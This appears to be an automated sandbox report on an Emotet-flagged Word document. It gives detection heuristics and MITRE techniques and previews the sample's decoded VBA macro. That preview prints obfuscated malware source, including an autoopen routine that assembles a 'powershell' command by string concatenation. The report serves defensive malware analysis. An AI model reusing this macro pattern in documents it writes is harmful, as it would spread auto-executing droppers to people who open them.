MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious OLE document containing VBA macros. The critical heuristics indicate the use of VBA to launch a WMI process for execution, a common technique for Emotet. The ClamAV detection explicitly names Emotet. The autoopen macro is present, suggesting an auto-execution vector.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6888557-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6888557-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 64482 bytes |
SHA-256: 31255a01e14b31b9f12a7c0e402d7c73a0020893aedb6654b1fc435fb8cb13d6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "fA4x41G_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function RxAkDG()
Set KUDADcQ4 = iDGQcDAB
If rAAwAo_U = pAXwQ_ Then
LAA111kB = Atn(389993422 - Chr(aAA_Ak) * HAXZAAQA * 781285850)
AQUXADD = CStr(Ik4Z1A1)
R1kCZQ = CStr(603495336 * 35185072)
ZZkAGCA = Tan(tkUABw - Sqr(jGwAQQ))
End If
Set IkXAAQB = IQXQkUAG
If RZDxDAA = DABDAQ Then
BCZAADw = Tan(495840326 - Round(CG1B1A) * wDDDZ4A * 717812965)
QUAwcDw = Atn(P1kBQxBG)
ZcQZUBxA = CByte(955441586 * 464899205)
QAAXGA = Oct(zABDBABA - CDate(iACAAQ))
End If
Set SAwZAADA = MAADkxA
If DDoBDGkA = PAwAQ4DA Then
vAkCA1AB = CDate(445482050 - Atn(PCwx4ZAB) * jxAxZx * 786532153)
BXBocAA = Tan(EoQ4Dk)
zAAk1c = CDate(538740175 * 920366575)
jCAAxAcw = Fix(CwGDB4QC - CDate(w1cAAA))
End If
Set qAAQDwA = iAwXAAZA
If dQx_GAA = vAAADZ1A Then
PAxAXx_w = Sqr(444195033 - Fix(HoAD4AA) * lX4xADAQ * 860980133)
FBUwUQ = Atn(XXAUB1QA)
nAZDwwD = Chr(62586747 * 2899116)
jUDAQA = Sin(dUAQxQQ - Hex(mUcABwk))
End If
Set AAZBBA = iCDcAA
If NACCAA = mGAwACUB Then
TABAwG4 = CStr(398873103 - Cos(Y_Q4Ac) * CAoAC4 * 817576821)
oDAwADB = CDate(cAU1DA)
WAAxDAA = CDate(480118261 * 784366991)
jACkDkA = CSng(uwUAABAG - CDate(YkBBAQwQ))
End If
Set RABcAAw = KCA_AwAw
If tDA_AAo = qXQB_AUA Then
rcwABA = CByte(835208117 - Hex(fXABBxc) * oBAA4DDA * 443397509)
cACAAwG = Tan(pBAZDAGx)
c__U_ACQ = ChrB(375301091 * 871441779)
JAUCBw = Log(jAAGACAB - Hex(kD1QoxDD))
End If
Set PG_B1AkB = AAoAAD
If vUAUAX = UAACxA Then
aQAABA4Q = Sin(423254718 - CDbl(pA1xA_xA) * voA_AGUB * 991777192)
ixkQAC_4 = Atn(wAQ14k)
YxAXD4 = Sin(891374137 * 649996850)
hwCA4UkA = CDate(QQQAUQC - Log(JABGAQxA))
End If
Set uDU4AUx = aAUDZk
If zZAkxAA = zUAA4GA Then
qAC44A = Round(713217518 - CDate(ZBGUkZAA) * SBBGUAU4 * 528361664)
TCoA1B4D = Fix(UDAQAB4A)
O4xkXAA = Rnd(254314206 * 846279766)
JGokAQc = CInt(mcAACQQ - Log(vkAkA4Q))
End If
End Function
Sub autoopen()
On Error Resume Next
Set qA1UGZA = JDCA1ZC
If iUUUGC4 = moZwDQDC Then
z1QAZA1 = CInt(892403472 - Cos(wC14oAAX) * RQAQQDA * 954218095)
kDAZG1A = CDbl(DUAXACAB)
C_AQ1kw = Hex(492367677 * 998563297)
IA4xAA = ChrB(wBcU1DDA - CLng(fUAABACB))
End If
Set HQo_AZAx = P_GAAU
If E4AkwU = lUXAoA_A Then
PBcAQAA4 = Oct(693188833 - Chr(K1UAoAUU) * aAAQABQ * 253914686)
MGQU1A = Fix(L14UDA)
YAcBAAx = Sgn(610649135 * 795647424)
hDDAD1kA = Round(PCBUA_A - ChrW(JAAADkAB))
End If
Set ND1ADA = WDkAAkAQ
If iDAAADB = CAZZxA Then
dADo4UAA = CLng(128701016 - CSng(CCAAACAx) * bCDA44x * 941855036)
AZwZZU = CDate(TUxGcQ)
p1AQ4AA = Sqr(540818717 * 34663150)
lckUCA = Chr(dAQkDDDA - Log(sC1xAA))
End If
bQABABAC (VAAkQoA + "po" + jABACA + "wershel" + CUAQ_QQ + YxAD1Ak + JXoGBUAA + KoUAA_Aw + tDAAcA + FABwAA + No_wUZB + bQAQABUU + DADAkAB + wQAAxQ + jCCAAwAw)
Set KUACcAA = iAQQ1w
If EADUZAX = fAUADA Then
sDUAAA_ = CInt(994063378 - CDate(QAADUG) * zAwUGko * 911548812)
vA1AcU = CDate(CGAZAU)
tAUQBAA = Log(12752109 * 659296595)
HAABDk = CLng(uoQACA - ChrW(QQZABAk))
End If
Set bGZoAAAZ = pcCoAUQk
If fUXAcA = FAA_xAA Then
GCAAUoXQ = Log(407682292 - Sin(XZxDAkAk) * vAUUAGo * 350980767)
Ew4GX4 = Cos(acABUw)
RAAoZGX = Oct(341599338 * 199806261)
AcwAAAA = Rnd(uDXkQA - CSng(KDAXAAD))
End If
End Sub
Function oAxA_Q()
Set ncQGA4D = kAAUQA4
If HD_GQAQ = aABAcAok Then
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.